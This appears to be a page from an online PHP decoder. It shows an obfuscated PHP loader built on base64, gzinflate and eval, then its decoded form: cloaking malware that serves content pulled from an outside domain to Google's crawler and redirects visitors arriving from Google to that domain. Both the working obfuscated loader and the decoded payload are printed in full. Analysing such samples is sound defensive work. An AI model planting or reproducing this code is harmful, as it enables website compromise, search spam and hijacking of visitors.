Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);$str2="XVJbc6IwFP5B+7ABZds8IhQIWtSEBMybIRYj4TKjoPjrN9hup+7DmUzm3L..
Decoded Output download
?>b'<?php
header(\'Content-Type:text/html;charset=utf-8\');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,\'oogle\')!== false)
{
$host_name = "http://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\'];
$file = file_get_contents(\'http://yn.gt881.com/\'."/index.php?host=".$host_name."&url=" . $_SERVER[\'QUERY_STRING\'] . "&domain=" . $_SERVER[\'SERVER_NAME\']);
echo $file;
}
$httpuser=strtolower($_SERVER[\'HTTP_REFERER\']);
if(strstr($httpuser,\'google\'))
{
Header("Location: https://tzyn.gt881.com/");
exit;
}
?>'Did this file decode correctly?
Original Code
<?php error_reporting(0);$str2="XVJbc6IwFP5B+7ABZds8IhQIWtSEBMybIRYj4TKjoPjrN9hup+7DmUzm3L7L2fjwuo/cxKuPepdhXaiy2dqwlyHrpWfRQ77Q6wbrQ7Qd9hG+CP9y2ofBWNgMbHIGuALzeKxe/G1b7W3mbIhb5VYSUM1NnBUJMKUBZBQwkoMgwtShSANT33VcHe8yiq9i9t7G4UUfyLURNmxESJsleYMbsqh32e3OSZV4zTnxlFsiD7diloDcdo4io6XZpwwuUPjtsBpRHwcwxSzOTIj4Gwdcb6kVxBb4L79AdPrTW2hyEwcz3614rc+cuBCFvBMh++CGa24ngzA6mLgvPdnKCF/X6nU4ZPOez7bztf/W72x4WY1FjxTsRG0085xJ29/7EN6lD9RKPWE3ddwq6itEyu0Nr49JI1Yxko0SM2peBlMWxHFaFU1OphpU8xBedpnuNwSVK/WkdfOvPwfOIqXU9FQvyAVLw6nkWdKK8YtbarRsgNETP3jIPNHFyZq8AMK+DdJm4/IZD2IB3uZWHGDzxww9Zv/w0AQyHh6BjBaWuY1x5ckfXn75V33fmEpDeNrluBP2/A/67LtPesqoc4RyGumX83finIQNBqQeu/Qh1GA9up/YT6+//gI=";$r='s'.chr(11*10+6).'r_repl'.chr(3*33+1-3).'ce';$cc='lchr';$cc=$r('l','',$cc);$b=$cc(90*1+8).'ase'.(8*8*1).$cc(2*50-5).'de'.$r(',','c',',').$r(',','od',',').'e';$g='gzinflate';$str2=$b($str2);$str=$g($str2);eval("?>".$b($str));?>Function Calls
| chr | 4 |
| gzinflate | 1 |
| str_replace | 3 |
| base64_decode | 2 |
| error_reporting | 1 |
Stats
| MD5 | 43844d0c0875d88669e56912070215d6 |
| Eval Count | 1 |
| Decode Time | 66 ms |